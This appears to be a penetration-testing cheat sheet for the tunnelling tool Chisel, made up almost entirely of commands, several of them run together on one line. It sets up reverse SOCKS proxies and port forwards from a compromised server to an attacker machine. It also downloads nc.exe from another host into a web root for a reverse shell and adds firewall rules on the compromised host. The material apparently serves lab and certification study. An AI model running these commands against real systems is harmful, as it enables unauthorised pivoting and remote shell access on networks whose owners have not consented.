Chisel
Chisel works in a client server way so the chisel binary needs to be on both the attacking machine and the compromised server.
Reverse Shell over SSH tunnel
Set up SSH tunnel and chisel server on your machine
chisel server -p 1335 --reverse &Set up chisel client on compromised webserver
./chisel client 10.10.14.10:1335 R:9999:socks &Start-Job {.\chisel.exe client 192.168.45.237:1335 R:9999:socks}
Start /B chisel.exe client 192.168.45.233:8080 R:9999:socks &Connecting to chisel server (10.10.14.10) on port 1335
Anything coming into port 9999 put it out chisel server port 9999
Set up python server on port 9999 and download reverse shell from other machine
curl http://172.16.1.100:9999/nc.exe -o C:\xampp\htdocs\nc.exe'Repeat port forward but on nc listening port
./chisel client 10.10.14.10:1335 1337:127.0.0.1:1337 &Reverse SOCKS Proxy
First we need to set up the chisel server on our attacking machine
chisel server -p 1335 --reverse &Next set up the client on the compromised server
./chisel client 10.50.102.164:1335 R:socks &R:socks
R means remotes. This tells chisel that the server is waiting for a proxy or port forward to be made
The connection will be made on port 1335 but the actual proxy is opened on port 1080. So we will be using 1080 to send traffic through the proxy.
Local Port Forward
A remote port forward is when we connect back from a compromised target to create the forward.
Start the chisel server on the compromised host (you will also have to open up the firewall port)
./chisel_windows.exe server --port 54321 --reverse --socks5netsh advfirewall firewall add rule name="Chisel-Adot8" dir=in action=allow protocol=tcp localport=15997OR
firewall-cmd --zone=public --add-port 15997/tcpConnect to the chisel server
chisel client 192.168.194.95:54321 127.0.0.1:9999:127.0.0.1:3306Last updated